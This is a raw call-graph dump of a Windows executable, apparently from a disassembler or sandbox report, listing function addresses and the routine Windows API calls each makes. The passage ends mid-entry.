20707->20586 20709 7ff6063a83e0 7 API calls 2 library calls 20707->20709 20709->20586 20721 7ff6063b2828 EnterCriticalSection 20710->20721 20723 7ff6063a6aa3 GetStartupInfoW 20722->20723 20723->20572 20725 7ff6063b3bd9 20724->20725 20726 7ff6063b3bcd 20724->20726 20725->20596 20729 7ff6063b3a00 48 API calls 5 library calls 20726->20729 20728->20596 20729->20725 20731 7ff606387a4c 20730->20731 20736 7ff606387ad9 20730->20736 20858 7ff6063813c4 20731->20858 20734 7ff606387a8d 20866 7ff606381c80 20734->20866 20736->20602 20737 7ff606387a9b 20737->20736 20738 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20737->20738 20739 7ff606387af5 20738->20739 20873 7ff60638dc4c 20740->20873 20742 7ff60639d0bd OleInitialize 20743 7ff60639d0e3 20742->20743 20744 7ff60639d109 SHGetMalloc 20743->20744 20744->20604 20746 7ff60639d759 20745->20746 20748 7ff60639d75e memcpy_s 20745->20748 20747 7ff606381b70 31 API calls 20746->20747 20747->20748 20749 7ff606381b70 31 API calls 20748->20749 20751 7ff60639d78d memcpy_s 20748->20751 20749->20751 20750 7ff606381b70 31 API calls 20752 7ff60639d7bc memcpy_s 20750->20752 20751->20750 20751->20752 20753 7ff606381b70 31 API calls 20752->20753 20754 7ff60639d7eb memcpy_s 20752->20754 20753->20754 20754->20608 20756 7ff6063813bb 20755->20756 20757 7ff6063812f0 20755->20757 21301 7ff606381bd4 33 API calls std::_Xinvalid_argument 20756->21301 20760 7ff6063812fe memcpy_s 20757->20760 20761 7ff606381358 20757->20761 20762 7ff6063813b6 20757->20762 20760->20618 20761->20760 20764 7ff6063a5ae0 4 API calls 20761->20764 21300 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 20762->21300 20764->20760 20766 7ff60638cf98 33 API calls 20765->20766 20782 7ff6063a066f memcpy_s 20766->20782 20767 7ff6063a08db 20768 7ff6063a090e 20767->20768 20770 7ff6063a0934 20767->20770 20769 7ff6063a5c30 _handle_error 8 API calls 20768->20769 20771 7ff6063a091f 20769->20771 20773 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20770->20773 20771->20626 20772 7ff60638cf98 33 API calls 20772->20782 20774 7ff6063a0939 20773->20774 21303 7ff60638353c 47 API calls 20774->21303 20775 7ff6063a093f 21304 7ff60638353c 47 API calls 20775->21304 20780 7ff606381b70 31 API calls 20780->20782 20781 7ff6063812bc 33 API calls 20781->20782 20782->20767 20782->20770 20782->20772 20782->20774 20782->20775 20782->20780 20782->20781 21302 7ff60638be7c 131 API calls shared_ptr 20782->21302 20784 7ff6063a3840 SetEnvironmentVariableW 20783->20784 20785 7ff6063a383d 20783->20785 20786 7ff60638cf98 33 API calls 20784->20786 20785->20784 20793 7ff6063a3878 20786->20793 20787 7ff6063a38c7 20788 7ff6063a38fe 20787->20788 20790 7ff6063a391f 20787->20790 20789 7ff6063a5c30 _handle_error 8 API calls 20788->20789 20791 7ff6063a390f 20789->20791 20792 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20790->20792 20791->20610 20791->20661 20794 7ff6063a3924 20792->20794 20793->20787 20795 7ff6063a38b1 SetEnvironmentVariableW 20793->20795 20795->20787 20797 7ff6063813c4 33 API calls 20796->20797 20798 7ff606387c45 20797->20798 20799 7ff606387c48 GetModuleFileNameW 20798->20799 20802 7ff606387c98 20798->20802 20800 7ff606387c9a 20799->20800 20801 7ff606387c63 20799->20801 20800->20802 20801->20798 20803 7ff6063812bc 33 API calls 20802->20803 20805 7ff606387cc2 20803->20805 20804 7ff606387cfa 20804->20614 20805->20804 20806 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20805->20806 20807 7ff606387d1c 20806->20807 20809 7ff606381b83 20808->20809 20810 7ff606381bac 20808->20810 20809->20810 20811 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20809->20811 20810->20621 20812 7ff606381bd0 20811->20812 20814 7ff60638620d _snwprintf 20813->20814 20815 7ff6063ad348 swprintf 46 API calls 20814->20815 20816 7ff606386229 SetEnvironmentVariableW GetModuleHandleW LoadIconW 20815->20816 20817 7ff60639eb64 LoadBitmapW 20816->20817 20818 7ff60639eb8e 20817->20818 20819 7ff60639eb96 20817->20819 21305 7ff60639c260 FindResourceExW 20818->21305 20821 7ff60639eb9e GetObjectW 20819->20821 20822 7ff60639ebb3 20819->20822 20821->20822 21319 7ff60639c12c 20822->21319 20825 7ff60639ec1e 20836 7ff606389cac 20825->20836 20826 7ff60639ebee 21324 7ff60639c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 20826->21324 20827 7ff60639c260 10 API calls 20829 7ff60639ebda 20827->20829 20829->20826 20831 7ff60639ebe2 DeleteObject 20829->20831 20830 7ff60639ebf7 21325 7ff60639c15c 20830->21325 20831->20826 20835 7ff60639ec0f DeleteObject 20835->20825 21332 7ff606389cdc 20836->21332 20838 7ff606389cba 21399 7ff60638a83c GetModuleHandleW FindResourceW 20838->21399 20840 7ff606389cc2 20840->20642 20842 7ff6063a5ae0 4 API calls 20841->20842 20843 7ff60639a476 20842->20843 20843->20652 20845 7ff60639d13d 20844->20845 20846 7ff60639d146 OleUninitialize 20845->20846 20847 7ff6063ef2e0 20846->20847 21488 7ff6063aadcc 31 API calls _invalid_parameter_noinfo_noreturn 20848->21488 20850 7ff6063aaead 21489 7ff6063aaec4 16 API calls abort 20850->21489 20853->20650 20854->20663 20855->20670 20856->20675 20857->20690 20859 7ff6063813cd 20858->20859 20865 7ff60638144d GetCurrentDirectoryW 20858->20865 20860 7ff60638145d 20859->20860 20863 7ff6063813ee memcpy_s 20859->20863 20871 7ff606381be8 33 API calls std::_Xinvalid_argument 20860->20871 20870 7ff60638196c 31 API calls _invalid_parameter_noinfo_noreturn 20863->20870 20865->20734 20867 7ff606381cc6 20866->20867 20869 7ff606381c9b memcpy_s 20866->20869 20872 7ff606381464 33 API calls 3 library calls 20867->20872 20869->20737 20870->20865 20872->20869 20874 7ff6063813c4 33 API calls 20873->20874 20875 7ff60638dc94 GetSystemDirectoryW 20874->20875 20876 7ff60638dcb9 20875->20876 20894 7ff60638dcb2 20875->20894 20879 7ff6063812bc 33 API calls 20876->20879 20877 7ff60638de4c 21029 7ff6063a5c30 20877->21029 20882 7ff60638dcf1 20879->20882 20880 7ff60638de79 20883 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20880->20883 20885 7ff6063812bc 33 API calls 20882->20885 20884 7ff60638de7e 20883->20884 20886 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20884->20886 20887 7ff60638dd19 20885->20887 20888 7ff60638de84 20886->20888 20982 7ff6063888f8 20887->20982 20890 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20888->20890 20892 7ff60638de8a 20890->20892 20891 7ff60638ddb5 LoadLibraryExW 20891->20894 20895 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20892->20895 20893 7ff60638dd2b 20893->20884 20893->20888 20893->20891 20894->20877 20894->20880 20894->20892 20896 7ff60638de90 _snwprintf 20895->20896 20897 7ff60638deb8 GetModuleHandleW 20896->20897 20898 7ff60638df3f 20897->20898 20899 7ff60638deea GetProcAddress 20897->20899 20902 7ff60638e3c7 20898->20902 21038 7ff6063aec3c 39 API calls 2 library calls 20898->21038 20900 7ff60638deff 20899->20900 20901 7ff60638df17 GetProcAddress 20899->20901 20900->20901 20901->20898 20904 7ff60638df2c 20901->20904 20903 7ff606387c10 34 API calls 20902->20903 20906 7ff60638e3d0 20903->20906 20904->20898 20998 7ff606388b28 20906->20998 20907 7ff60638e274 20907->20902 20909 7ff60638e27e 20907->20909 20910 7ff606387c10 34 API calls 20909->20910 20911 7ff60638e287 CreateFileW 20910->20911 20912 7ff60638e3b4 CloseHandle 20911->20912 20913 7ff60638e2c7 SetFilePointer 20911->20913 20916 7ff606381b70 31 API calls 20912->20916 20913->20912 20915 7ff60638e2e0 ReadFile 20913->20915 20915->20912 20917 7ff60638e308 20915->20917 20916->20902 20918 7ff60638e6c4 20917->20918 20919 7ff60638e31c 20917->20919 21057 7ff6063a5df4 8 API calls 20918->21057 20924 7ff6063812bc 33 API calls 20919->20924 20920 7ff60638dc4c 77 API calls 20943 7ff60638e3de 20920->20943 20922 7ff60638e402 CompareStringW 20922->20943 20923 7ff6063812bc 33 API calls 20923->20943 20931 7ff60638e353 20924->20931 20926 7ff60638e4fe 20929 7ff60638e686 20926->20929 20930 7ff60638e50c 20926->20930 20927 7ff606381b70 31 API calls 20927->20943 20933 7ff606381b70 31 API calls 20929->20933 21043 7ff606388be4 47 API calls 20930->21043 20937 7ff60638e39f 20931->20937 20944 7ff60638dc4c 77 API calls 20931->20944 21039 7ff60638cf98 20931->21039 20940 7ff60638e68f 20933->20940 20934 7ff60638e6c9 20935 7ff60638e6ef 20934->20935 21058 7ff606383b84 RtlPcToFileHeader RaiseException _com_raise_error 20934->21058 20942 7ff60638e709 SetThreadExecutionState 20935->20942 21059 7ff606383b84 RtlPcToFileHeader RaiseException _com_raise_error 20935->21059 20938 7ff606381b70 31 API calls 20937->20938 20945 7ff60638e3a9 20938->20945 20939 7ff60638e515 20946 7ff606386768 9 API calls 20939->20946 20948 7ff606381b70 31 API calls 20940->20948 20943->20920 20943->20922 20943->20923 20943->20927 20966 7ff60638e490 20943->20966 21006 7ff606386768 20943->21006 21011 7ff606388dc4 20943->21011 21015 7ff606385890 20943->21015 20944->20931 20950 7ff606381b70 31 API calls 20945->20950 20951 7ff60638e51a 20946->20951 20947 7ff6063812bc 33 API calls 20947->20966 20952 7ff60638e699 20948->20952 20950->20912 20953 7ff60638e525 20951->20953 20954 7ff60638e5ca 20951->20954 20956 7ff6063a5c30 _handle_error 8 API calls 20952->20956 20957 7ff60638dc4c 77 API calls 20953->20957 20958 7ff60638da04 48 API calls 20954->20958 20955 7ff606388dc4 47 API calls 20955->20966 20959 7ff60638e6a8 20956->20959 20960 7ff60638e531 20957->20960 20961 7ff60638e60f AllocConsole 20958->20961 20959->20742 20963 7ff60638dc4c 77 API calls 20960->20963 20964 7ff60638e5bf 20961->20964 20965 7ff60638e619 GetCurrentProcessId AttachConsole 20961->20965 20962 7ff606381b70 31 API calls 20962->20966 20967 7ff60638e53d 20963->20967 21056 7ff6063819d0 31 API calls _invalid_parameter_noinfo_noreturn 20964->21056 20968 7ff60638e630 20965->20968 20966->20926 20966->20947 20966->20955 20966->20962 20969 7ff606385890 51 API calls 20966->20969 21044 7ff60638aee0 20967->21044 20975 7ff60638e63c GetStdHandle WriteConsoleW Sleep FreeConsole 20968->20975 20969->20966 20972 7ff60638e67d ExitProcess 20975->20964 20977 7ff60638aee0 48 API calls 20978 7ff60638e592 20977->20978 21054 7ff60638db98 33 API calls 20978->21054 20980 7ff60638e59e 21055 7ff6063819d0 31 API calls _invalid_parameter_noinfo_noreturn 20980->21055 20983 7ff606388936 20982->20983 21060 7ff606382314 20983->21060 20985 7ff606388987 21070 7ff606381c04 20985->21070 20986 7ff606388946 20986->20985 21074 7ff606381734 33 API calls 4 library calls 20986->21074 20988 7ff6063889cd 20990 7ff6063889f0 20988->20990 20991 7ff606381c80 33 API calls 20988->20991 20992 7ff606388a28 20990->20992 20994 7ff606388a44 20990->20994 20991->20990 20993 7ff6063a5c30 _handle_error 8 API calls 20992->20993 20995 7ff606388a39 20993->20995 20996 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 20994->20996 20995->20893 20997 7ff606388a49 20996->20997 20999 7ff606388b40 20998->20999 21000 7ff606388b57 20999->21000 21001 7ff606388b89 20999->21001 21004 7ff6063812bc 33 API calls 21000->21004 21098 7ff60638353c 47 API calls 21001->21098 21005 7ff606388b7b 21004->21005 21005->20943 21007 7ff60638678c GetVersionExW 21006->21007 21008 7ff6063867bf 21006->21008 21007->21008 21009 7ff6063a5c30 _handle_error 8 API calls 21008->21009 21010 7ff6063867ec 21009->21010 21010->20943 21012 7ff606388dd9 21011->21012 21099 7ff606388f28 21012->21099 21014 7ff606388dfe 21014->20943 21016 7ff6063858bb GetFileAttributesW 21015->21016 21017 7ff6063858b8 21015->21017 21018 7ff6063858cc 21016->21018 21019 7ff606385949 21016->21019 21017->21016 21108 7ff6063880b0 21018->21108 21021 7ff6063a5c30 _handle_error 8 API calls 21019->21021 21023 7ff60638595d 21021->21023 21023->20943 21024 7ff6063858f7 GetFileAttributesW 21025 7ff606385910 21024->21025 21025->21019 21026 7ff60638596d 21025->21026 21027 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21026->21027 21028 7ff606385972 21027->21028 21030 7ff6063a5c39 21029->21030 21031 7ff60638de60 21030->21031 21032 7ff6063a5d20 IsProcessorFeaturePresent 21030->21032 21031->20742 21033 7ff6063a5d38 21032->21033 21199 7ff6063a5f14 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 21033->21199 21035 7ff6063a5d4b 21200 7ff6063a5ce0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21035->21200 21038->20907 21042 7ff60638cfca 21039->21042 21040 7ff60638cffe 21040->20931 21041 7ff606381734 33 API calls 21041->21042 21042->21040 21042->21041 21043->20939 21045 7ff60638aef3 21044->21045 21201 7ff606389b74 21045->21201 21048 7ff60638af86 21051 7ff60638da04 21048->21051 21049 7ff60638af58 LoadStringW 21049->21048 21050 7ff60638af71 LoadStringW 21049->21050 21050->21048 21227 7ff60638d7e0 21051->21227 21054->20980 21055->20964 21056->20972 21057->20934 21058->20935 21059->20942 21061 7ff606382344 21060->21061 21068 7ff6063823f8 21060->21068 21064 7ff6063823f3 21061->21064 21065 7ff6063823a1 21061->21065 21067 7ff606382352 memcpy_s 21061->21067 21084 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21064->21084 21065->21067 21075 7ff6063a5ae0 21065->21075 21067->20986 21085 7ff606381bd4 33 API calls std::_Xinvalid_argument 21068->21085 21071 7ff606381c29 memcpy_s 21070->21071 21072 7ff606381c55 21070->21072 21071->20988 21097 7ff6063815a8 33 API calls 3 library calls 21072->21097 21074->20985 21077 7ff6063a5aeb 21075->21077 21076 7ff6063a5b04 21076->21067 21077->21076 21079 7ff6063a5b0a 21077->21079 21086 7ff6063af0c8 21077->21086 21082 7ff6063a5b15 21079->21082 21089 7ff6063a674c RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21079->21089 21090 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21082->21090 21091 7ff6063af108 21086->21091 21089->21082 21096 7ff6063b2828 EnterCriticalSection 21091->21096 21097->21071 21100 7ff6063890c6 21099->21100 21103 7ff606388f5a 21099->21103 21107 7ff60638353c 47 API calls 21100->21107 21105 7ff606388f74 memcpy_s 21103->21105 21106 7ff606386edc 33 API calls 2 library calls 21103->21106 21105->21014 21106->21105 21109 7ff6063880ef 21108->21109 21129 7ff6063880e8 21108->21129 21111 7ff6063812bc 33 API calls 21109->21111 21110 7ff6063a5c30 _handle_error 8 API calls 21112 7ff6063858f3 21110->21112 21113 7ff60638811a 21111->21113 21112->21024 21112->21025 21114 7ff60638813a 21113->21114 21115 7ff60638836b 21113->21115 21117 7ff606388154 21114->21117 21141 7ff6063881ed 21114->21141 21116 7ff606387a28 35 API calls 21115->21116 21121 7ff60638838a 21116->21121 21118 7ff60638874f 21117->21118 21181 7ff606387050 21117->21181 21194 7ff606381bd4 33 API calls std::_Xinvalid_argument 21118->21194 21120 7ff606388593 21124 7ff606388773 21120->21124 21131 7ff606387050 4 API calls 21120->21131 21121->21120 21125 7ff6063883bf 21121->21125 21127 7ff6063881e8 21121->21127 21122 7ff606388755 21133 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21122->21133 21197 7ff606381bd4 33 API calls std::_Xinvalid_argument 21124->21197 21132 7ff606388761 21125->21132 21138 7ff606387050 4 API calls 21125->21138 21126 7ff606388779 21134 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21126->21134 21127->21122 21127->21126 21127->21129 21135 7ff60638874a 21127->21135 21129->21110 21130 7ff6063881a7 21142 7ff606381b70 31 API calls 21130->21142 21148 7ff6063881b9 memcpy_s 21130->21148 21136 7ff6063885fa 21131->21136 21195 7ff606381bd4 33 API calls std::_Xinvalid_argument 21132->21195 21139 7ff60638875b 21133->21139 21140 7ff60638877f 21134->21140 21146 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21135->21146 21192 7ff6063811ec 33 API calls memcpy_s 21136->21192 21156 7ff60638841a memcpy_s 21138->21156 21150 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21139->21150 21152 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21140->21152 21141->21127 21147 7ff6063812bc 33 API calls 21141->21147 21142->21148 21144 7ff606388767 21155 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21144->21155 21145 7ff606381b70 31 API calls 21145->21127 21146->21118 21153 7ff606388262 21147->21153 21148->21145 21149 7ff60638860d 21193 7ff606386d64 33 API calls memcpy_s 21149->21193 21150->21132 21151 7ff606381b70 31 API calls 21168 7ff606388499 21151->21168 21157 7ff606388785 21152->21157 21189 7ff606386dd8 33 API calls 21153->21189 21159 7ff60638876d 21155->21159 21156->21144 21156->21151 21196 7ff60638353c 47 API calls 21159->21196 21160 7ff606388277 21190 7ff6063852c0 33 API calls 2 library calls 21160->21190 21162 7ff606381b70 31 API calls 21164 7ff606388690 21162->21164 21167 7ff606381b70 31 API calls 21164->21167 21165 7ff60638828d memcpy_s 21165->21139 21170 7ff606381b70 31 API calls 21165->21170 21166 7ff60638861d memcpy_s 21166->21140 21166->21162 21171 7ff60638869a 21167->21171 21172 7ff6063884c5 21168->21172 21191 7ff606381734 33 API calls 4 library calls 21168->21191 21173 7ff606388311 21170->21173 21174 7ff606381b70 31 API calls 21171->21174 21172->21159 21175 7ff6063812bc 33 API calls 21172->21175 21177 7ff606381b70 31 API calls 21173->21177 21174->21127 21176 7ff606388566 21175->21176 21178 7ff606381c04 33 API calls 21176->21178 21177->21127 21179 7ff606388583 21178->21179 21180 7ff606381b70 31 API calls 21179->21180 21180->21127 21182 7ff60638709d 21181->21182 21185 7ff6063870b2 memcpy_s 21181->21185 21183 7ff60638715d 21182->21183 21184 7ff6063870e4 21182->21184 21182->21185 21198 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21183->21198 21184->21185 21188 7ff6063a5ae0 4 API calls 21184->21188 21185->21130 21188->21185 21189->21160 21190->21165 21191->21172 21192->21149 21193->21166 21199->21035 21208 7ff606389a38 21201->21208 21204 7ff606389bd9 21206 7ff6063a5c30 _handle_error 8 API calls 21204->21206 21207 7ff606389bf2 21206->21207 21207->21048 21207->21049 21209 7ff606389a92 21208->21209 21217 7ff606389b30 21208->21217 21213 7ff606389ac0 21209->21213 21222 7ff606390688 WideCharToMultiByte 21209->21222 21211 7ff6063a5c30 _handle_error 8 API calls 21212 7ff606389b64 21211->21212 21212->21204 21218 7ff606389c00 21212->21218 21216 7ff606389aef 21213->21216 21224 7ff60638ae88 45 API calls _snwprintf 21213->21224 21225 7ff6063ad62c 31 API calls 2 library calls 21216->21225 21217->21211 21219 7ff606389c40 21218->21219 21221 7ff606389c69 21218->21221 21226 7ff6063ad62c 31 API calls 2 library calls 21219->21226 21221->21204 21223 7ff6063906ca 21222->21223 21223->21213 21224->21216 21225->21217 21226->21221 21243 7ff60638d43c 21227->21243 21231 7ff60638d851 _snwprintf 21239 7ff60638d8e0 21231->21239 21257 7ff6063ad348 21231->21257 21284 7ff606383550 33 API calls 21231->21284 21233 7ff60638d90f 21235 7ff60638d983 21233->21235 21238 7ff60638d9ab 21233->21238 21236 7ff6063a5c30 _handle_error 8 API calls 21235->21236 21237 7ff60638d997 21236->21237 21237->20977 21240 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21238->21240 21239->21233 21285 7ff606383550 33 API calls 21239->21285 21241 7ff60638d9b0 21240->21241 21244 7ff60638d5d1 21243->21244 21245 7ff60638d46e 21243->21245 21247 7ff60638ca1c 21244->21247 21245->21244 21246 7ff606381734 33 API calls 21245->21246 21246->21245 21248 7ff60638ca52 21247->21248 21255 7ff60638cb1c 21247->21255 21249 7ff60638ca62 21248->21249 21252 7ff60638cb17 21248->21252 21253 7ff60638cabc 21248->21253 21249->21231 21286 7ff606381b50 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 21252->21286 21253->21249 21256 7ff6063a5ae0 4 API calls 21253->21256 21287 7ff606381bd4 33 API calls std::_Xinvalid_argument 21255->21287 21256->21249 21258 7ff6063ad38e 21257->21258 21259 7ff6063ad3a6 21257->21259 21288 7ff6063b0bac 15 API calls _invalid_parameter_noinfo_noreturn 21258->21288 21259->21258 21261 7ff6063ad3b0 21259->21261 21290 7ff6063ab348 35 API calls 2 library calls 21261->21290 21262 7ff6063ad393 21289 7ff6063aae74 31 API calls _invalid_parameter_noinfo_noreturn 21262->21289 21265 7ff6063a5c30 _handle_error 8 API calls 21267 7ff6063ad563 21265->21267 21266 7ff6063ad3c1 memcpy_s 21291 7ff6063ab2c8 15 API calls memcpy_s 21266->21291 21267->21231 21269 7ff6063ad42c 21292 7ff6063ab750 46 API calls 3 library calls 21269->21292 21271 7ff6063ad435 21272 7ff6063ad46c 21271->21272 21273 7ff6063ad43d 21271->21273 21275 7ff6063ad4c4 21272->21275 21276 7ff6063ad4ea 21272->21276 21277 7ff6063ad47b 21272->21277 21278 7ff6063ad472 21272->21278 21293 7ff6063b0e1c 21273->21293 21279 7ff6063b0e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21275->21279 21276->21275 21280 7ff6063ad4f4 21276->21280 21281 7ff6063b0e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21277->21281 21278->21275 21278->21277 21283 7ff6063ad39e 21279->21283 21282 7ff6063b0e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 21280->21282 21281->21283 21282->21283 21283->21265 21284->21231 21285->21233 21288->21262 21289->21283 21290->21266 21291->21269 21292->21271 21294 7ff6063b0e21 RtlFreeHeap 21293->21294 21298 7ff6063b0e51 Concurrency::details::SchedulerProxy::DeleteThis 21293->21298 21295 7ff6063b0e3c 21294->21295 21294->21298 21299 7ff6063b0bac 15 API calls _invalid_parameter_noinfo_noreturn 21295->21299 21297 7ff6063b0e41 GetLastError 21297->21298 21298->21283 21299->21297 21302->20782 21306 7ff60639c3d7 21305->21306 21307 7ff60639c28b SizeofResource 21305->21307 21306->20819 21307->21306 21308 7ff60639c2a5 LoadResource 21307->21308 21308->21306 21309 7ff60639c2be LockResource 21308->21309 21309->21306 21310 7ff60639c2d3 GlobalAlloc 21309->21310 21310->21306 21311 7ff60639c2f4 GlobalLock 21310->21311 21312 7ff60639c3ce GlobalFree 21311->21312 21313 7ff60639c306 memcpy_s 21311->21313 21312->21306 21314 7ff60639c314 CreateStreamOnHGlobal 21313->21314 21315 7ff60639c3c5 GlobalUnlock 21314->21315 21316 7ff60639c332 21314->21316 21315->21312 21316->21315 21317 7ff60639c3ae 21316->21317 21318 7ff60639c396 GdipCreateHBITMAPFromBitmap 21316->21318 21317->21315 21318->21317 21320 7ff60639c15c 4 API calls 21319->21320 21321 7ff60639c13a 21320->21321 21322 7ff60639c149 21321->21322 21330 7ff60639c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21321->21330 21322->20825 21322->20826 21322->20827 21324->20830 21326 7ff60639c16e 21325->21326 21327 7ff60639c173 21325->21327 21331 7ff60639c1cc GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21326->21331 21329 7ff60639ca30 16 API calls _handle_error 21327->21329 21329->20835 21330->21322 21331->21327 21335 7ff606389cfe _snwprintf 21332->21335 21333 7ff606389d73 21453 7ff60638806c 48 API calls 21333->21453 21335->21333 21336 7ff606389e89 21335->21336 21338 7ff606389dfd 21336->21338 21341 7ff606381c80 33 API calls 21336->21341 21337 7ff606381b70 31 API calls 21337->21338 21401 7ff6063846a0 21338->21401 21339 7ff606389d7d memcpy_s 21339->21337 21340 7ff60638a82e 21339->21340 21342 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21340->21342 21341->21338 21344 7ff60638a834 21342->21344 21347 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21344->21347 21346 7ff606389e22 21348 7ff60638424c 100 API calls 21346->21348 21350 7ff60638a83a 21347->21350 21352 7ff606389e2b 21348->21352 21349 7ff606389f17 21419 7ff6063ad800 21349->21419 21352->21344 21354 7ff606389e66 21352->21354 21358 7ff6063a5c30 _handle_error 8 API calls 21354->21358 21355 7ff606389ead 21355->21349 21356 7ff606389254 33 API calls 21355->21356 21356->21355 21357 7ff6063ad800 31 API calls 21370 7ff606389f57 __vcrt_FlsAlloc 21357->21370 21359 7ff60638a80e 21358->21359 21359->20838 21360 7ff60638a089 21361 7ff606384c40 101 API calls 21360->21361 21373 7ff60638a15c 21360->21373 21364 7ff60638a0a1 21361->21364 21367 7ff606384a70 104 API calls 21364->21367 21364->21373 21371 7ff60638a0c9 21367->21371 21370->21360 21370->21373 21427 7ff606384d50 21370->21427 21436 7ff606384a70 21370->21436 21441 7ff606384c40 21370->21441 21371->21373 21394 7ff60638a0d7 __vcrt_FlsAlloc 21371->21394 21454 7ff60639033c MultiByteToWideChar 21371->21454 21446 7ff60638424c 21373->21446 21374 7ff60638a5ec 21388 7ff60638a6c2 21374->21388 21460 7ff6063b0498 31 API calls 2 library calls 21374->21460 21376 7ff60638a557 21376->21374 21457 7ff6063b0498 31 API calls 2 library calls 21376->21457 21377 7ff60638a54b 21377->20838 21380 7ff60638a7a2 21383 7ff6063ad800 31 API calls 21380->21383 21381 7ff60638a649 21461 7ff6063aecc4 31 API calls _invalid_parameter_noinfo_noreturn 21381->21461 21382 7ff60638a6ae 21382->21388 21462 7ff6063890cc 33 API calls Concurrency::cancel_current_task 21382->21462 21386 7ff60638a7cb 21383->21386 21384 7ff606389254 33 API calls 21384->21388 21390 7ff6063ad800 31 API calls 21386->21390 21388->21380 21388->21384 21389 7ff60638a56d 21458 7ff6063aecc4 31 API calls _invalid_parameter_noinfo_noreturn 21389->21458 21390->21373 21391 7ff60638a5d8 21391->21374 21459 7ff6063890cc 33 API calls Concurrency::cancel_current_task 21391->21459 21392 7ff606390688 WideCharToMultiByte 21392->21394 21394->21373 21394->21374 21394->21376 21394->21377 21394->21392 21395 7ff60638a829 21394->21395 21455 7ff60638ae88 45 API calls _snwprintf 21394->21455 21456 7ff6063ad62c 31 API calls 2 library calls 21394->21456 21463 7ff6063a5df4 8 API calls 21395->21463 21400 7ff60638a868 21399->21400 21400->20840 21402 7ff6063846dd CreateFileW 21401->21402 21404 7ff60638478e GetLastError 21402->21404 21414 7ff60638484e 21402->21414 21405 7ff6063880b0 49 API calls 21404->21405 21406 7ff6063847bc 21405->21406 21407 7ff6063847c0 CreateFileW GetLastError 21406->21407 21413 7ff60638480c 21406->21413 21407->21413 21408 7ff606384891 SetFileTime 21412 7ff6063848af 21408->21412 21409 7ff6063848e8 21410 7ff6063a5c30 _handle_error 8 API calls 21409->21410 21411 7ff6063848fb 21410->21411 21411->21346 21411->21355 21412->21409 21415 7ff606381c80 33 API calls 21412->21415 21413->21414 21416 7ff606384916 21413->21416 21414->21408 21414->21412 21415->21409 21417 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21416->21417 21418 7ff60638491b 21417->21418 21420 7ff6063ad82d 21419->21420 21426 7ff6063ad842 21420->21426 21464 7ff6063b0bac 15 API calls _invalid_parameter_noinfo_noreturn 21420->21464 21422 7ff6063ad837 21465 7ff6063aae74 31 API calls _invalid_parameter_noinfo_noreturn 21422->21465 21424 7ff6063a5c30 _handle_error 8 API calls 21425 7ff606389f37 21424->21425 21425->21357 21426->21424 21428 7ff606384d6d 21427->21428 21429 7ff606384d89 21427->21429 21430 7ff606384d9b 21428->21430 21466 7ff606383eac 99 API calls _com_raise_error 21428->21466 21429->21430 21432 7ff606384da1 SetFilePointer 21429->21432 21430->21370 21432->21430 21433 7ff606384dbe GetLastError 21432->21433 21433->21430 21434 7ff606384dc8 21433->21434 21434->21430 21467 7ff606383eac 99 API calls _com_raise_error 21434->21467 21437 7ff606384a96 21436->21437 21439 7ff606384a9d 21436->21439 21437->21370 21439->21437 21440 7ff606384520 GetStdHandle ReadFile GetLastError GetLastError GetFileType 21439->21440 21468 7ff606383d8c 99 API calls _com_raise_error 21439->21468 21440->21439 21469 7ff60638491c 21441->21469 21444 7ff606384c67 21444->21370 21447 7ff606384266 21446->21447 21448 7ff606384277 21446->21448 21447->21448 21449 7ff606384279 21447->21449 21450 7ff606384272 21447->21450 21481 7ff6063842d0 21449->21481 21477 7ff6063844e0 21450->21477 21453->21339 21454->21394 21455->21394 21456->21394 21457->21389 21458->21391 21459->21374 21460->21381 21461->21382 21462->21388 21463->21340 21464->21422 21465->21426 21475 7ff60638492d _snwprintf 21469->21475 21470 7ff606384959 21472 7ff6063a5c30 _handle_error 8 API calls 21470->21472 21471 7ff606384a34 SetFilePointer 21471->21470 21474 7ff606384a5c GetLastError 21471->21474 21473 7ff6063849c1 21472->21473 21473->21444 21476 7ff606383eac 99 API calls _com_raise_error 21473->21476 21474->21470 21475->21470 21475->21471 21478 7ff606384503 21477->21478 21479 7ff6063844ef 21477->21479 21478->21448 21479->21478 21480 7ff6063842d0 100 API calls 21479->21480 21480->21478 21482 7ff606384302 21481->21482 21483 